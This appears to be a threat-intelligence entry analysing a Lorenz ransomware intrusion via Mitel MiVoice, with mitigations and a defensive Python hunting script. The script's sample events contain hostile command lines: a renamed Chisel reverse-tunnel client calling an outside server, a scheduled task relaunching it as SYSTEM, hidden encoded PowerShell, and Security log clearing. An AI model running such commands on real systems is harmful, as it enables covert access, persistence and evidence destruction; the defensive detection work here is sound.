Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free
AI Analysis
Technical Summary
The report covers an intrusion by the Lorenz ransomware group that began with a Mitel MiVoice appliance, a unified communications platform widely deployed in enterprise telephony. The title's "calls back for free" is a pun on the reverse connection, not a description of toll fraud: nothing in the record describes unauthorized calling, while the ELF and Windows Chisel binaries listed as indicators point to the compromised appliance opening a tunnel back out to attacker infrastructure (T1090) so the operators could re-enter the network at will. Lorenz's tradecraft in this case chains exploitation of a public-facing application (T1190) with web shells, encrypted command channels and credential harvesting from LSASS memory, followed by PowerShell and Windows command shell execution (T1059.001, T1059.003), registry modification (T1112), scheduled-task persistence (T1053, T1053.005), network configuration and security software discovery (T1016, T1518.001), data encryption for impact (T1486), system shutdown or reboot (T1529) and clearing of Windows event logs (T1070.001). The threat record's metadata reports no known exploit in the wild and a low severity rating, with an overall threat level of 4 out of 10; the first of these is at odds with the report itself, which describes a live intrusion, so treat the flag as a database artifact rather than a statement about exploitability. The record lists no affected versions or patch links, so the analysis should be read as an OSINT-derived intelligence summary with moderate (50%) confidence. Initial access depends on a MiVoice component being reachable from the internet and left unpatched or misconfigured.
Potential Impact
For European organizations running Mitel MiVoice, the risk is less about the telephony service itself than about the appliance as a foothold. A unified communications box that is reachable from the internet and typically cannot run endpoint agents is an attractive entry point: once compromised it gives the attacker a tunnel into the internal network, exposure of sensitive communications, and a staging point for credential theft and remote desktop abuse against Windows hosts. The ransomware stage then threatens integrity and availability by encrypting files and forcing shutdowns or reboots, while event-log clearing and tunneled command traffic slow detection and forensic reconstruction. Sectors that depend heavily on unified communications, such as finance, healthcare and government, face the sharpest operational impact, and because European enterprise and telecom networks are closely interconnected, a compromise at one organization can spill over to service providers and supply-chain partners.
Mitigation Recommendations
European organizations should implement targeted mitigations beyond generic advice:
1) Inventory Mitel MiVoice deployments, confirm every component runs the latest vendor-recommended release and configuration, and verify that management interfaces are not directly reachable from the internet; a voice appliance that must be exposed belongs behind a VPN or reverse proxy with strict allow-listing.
2) Harden remaining public-facing applications with strict access controls, multi-factor authentication and network segmentation, so that a compromised appliance cannot reach Windows infrastructure directly.
3) Monitor the telephony appliances themselves, not just call patterns: unexpected outbound connections from the appliance, new executables such as an ELF Chisel binary, and web shell artifacts are the early signals this case offers.
4) Deploy endpoint detection and response (EDR) on the Windows estate with rules for credential dumping from LSASS, encoded or hidden PowerShell, and scheduled task creation.
5) Forward logs to centralized, tamper-evident storage so that clearing a host's event log (T1070.001) does not erase the record; alert on the clearing event itself.
6) Restrict remote desktop protocol use and enforce just-in-time access with strong authentication.
7) Run regular threat hunts for Chisel-style tunneling (a renamed client binary with a server host:port and reverse remote on its command line) and for encrypted command and control channels leaving the network from unexpected hosts.
8) Develop and test incident response plans that cover ransomware and telephony compromise together, including backup and recovery for the unified communications infrastructure itself.
9) Collaborate with Mitel and cybersecurity information sharing organizations to receive timely threat intelligence and patches.
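A concrete hunting check for the EDR, logging and threat-hunting items above, written here as an added example rather than code from the report or from the analysis on this page. It runs over a flattened export of Windows process-creation (Sysmon Event ID 1) and Security (Event ID 1102) events and tags matches with the ATT&CK IDs cited above. The events, the server 203.0.113.10, the renamed svchost.exe binary and the task name are all constructed for the example; the Chisel argument shapes it keys on (the client subcommand, a server host:port, an R: reverse remote, options such as --fingerprint) are the tool's real command-line syntax.

```python
"""Hunt flattened Windows events for the Lorenz tradecraft described above:
Chisel tunneling (T1090), scheduled-task persistence (T1053.005), encoded
PowerShell (T1059.001) and event-log clearing (T1070.001).
All sample data below is constructed; nothing is taken from the report."""
import re
import shlex
from dataclasses import dataclass

# Constructed sample records in a Sysmon Event ID 1 / Security log shape.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    # Chisel client renamed to svchost.exe, reverse SOCKS remote (R:socks)
    {"EventID": 1, "Image": r"C:\ProgramData\svchost.exe",
     "CommandLine": "svchost.exe client --fingerprint Ab12cd34 203.0.113.10:443 R:socks"},
    # Scheduled task that relaunches the tunnel at logon
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc onlogon /tn "Updater" '
                    r'/tr "C:\ProgramData\svchost.exe client 203.0.113.10:443 R:socks" /ru SYSTEM'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil.exe cl Security"},
    {"EventID": 1102, "Image": "", "CommandLine": ""},  # Security log cleared
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]


@dataclass(frozen=True)
class Finding:
    technique: str
    reason: str
    evidence: str


def split_cmdline(cmd: str) -> list[str]:
    """Tokenize a Windows command line. Non-POSIX mode keeps backslashes and
    returns a quoted argument as one token; the quotes are stripped afterwards."""
    try:
        return [t.strip('"') for t in shlex.split(cmd, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return cmd.split()


# Chisel client syntax: chisel client [options] <server> <remote>...; a remote
# starting with "R:" is a reverse tunnel back to the attacker's server. We key on
# argument shape rather than the file name because the binary is routinely renamed.
_SERVER_RE = re.compile(r"^(?:https?://|wss?://)?[\w.\-]+:\d{1,5}$")
_LOCAL_REMOTE_RE = re.compile(r"^\d{1,5}:[\w.\-]+:\d{1,5}$")
_CHISEL_OPTS = {"--fingerprint", "--auth", "--keepalive", "--max-retry-count",
                "--tls-skip-verify", "--proxy", "--header"}
# Common spellings of -EncodedCommand (PowerShell accepts unambiguous prefixes).
_ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s)")


def looks_like_chisel(cmd: str) -> bool:
    tokens = split_cmdline(cmd)
    if not tokens:
        return False
    if "chisel" in tokens[0].lower():
        return True
    if "client" not in tokens:
        return False
    args = tokens[tokens.index("client") + 1:]
    has_remote = any(t.startswith("R:") or t == "socks" or _LOCAL_REMOTE_RE.match(t) for t in args)
    has_server = any(_SERVER_RE.match(t) for t in args)
    has_option = any(t in _CHISEL_OPTS for t in args)
    return has_remote and (has_server or has_option)


def hunt(events) -> list[Finding]:
    findings: list[Finding] = []
    for ev in events:
        if ev.get("EventID") == 1102:
            findings.append(Finding("T1070.001", "Security event log cleared", "Event ID 1102"))
            continue
        if ev.get("EventID") != 1:
            continue
        cmd = ev.get("CommandLine", "")
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        tokens = split_cmdline(cmd)
        lower = [t.lower() for t in tokens]
        if looks_like_chisel(cmd):
            findings.append(Finding("T1090", "Chisel client with reverse remote", cmd))
        if image == "schtasks.exe" and "/create" in lower:
            action = ""
            if "/tr" in lower and lower.index("/tr") + 1 < len(tokens):
                action = tokens[lower.index("/tr") + 1]
            findings.append(Finding("T1053.005", "Scheduled task created", action or cmd))
            if action and looks_like_chisel(action):  # persistence for the tunnel itself
                findings.append(Finding("T1090", "Scheduled task action relaunches Chisel", action))
        if image in ("powershell.exe", "pwsh.exe") and _ENCODED_RE.search(cmd):
            findings.append(Finding("T1059.001", "PowerShell with encoded command", cmd))
        if image == "wevtutil.exe" and len(lower) > 1 and lower[1] in ("cl", "clear-log"):
            findings.append(Finding("T1070.001", "Event log cleared with wevtutil", cmd))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.technique:<10} {f.reason}: {f.evidence}")
```

Run against the constructed events the script reports six findings: the renamed Chisel client, the scheduled task and the tunnel it relaunches, the encoded PowerShell, and the log clearing seen both as the wevtutil command and as Event ID 1102. Wiring the same logic to a SIEM export is a matter of mapping the field names; the point is that the Chisel match survives renaming because it reads the argument structure rather than the binary name.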
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Belgium, Sweden
Technical Details
- Threat Level: 4
- Analysis: 0
- Original Timestamp: 1666603345 (2022-10-24 09:22:25 UTC)
Threat ID: 682acdbebbaf20d303f0c209
Added to database: 5/19/2025, 6:20:46 AM
Last enriched: 7/2/2025, 7:58:43 AM
Last updated: 8/11/2025, 1:58:48 PM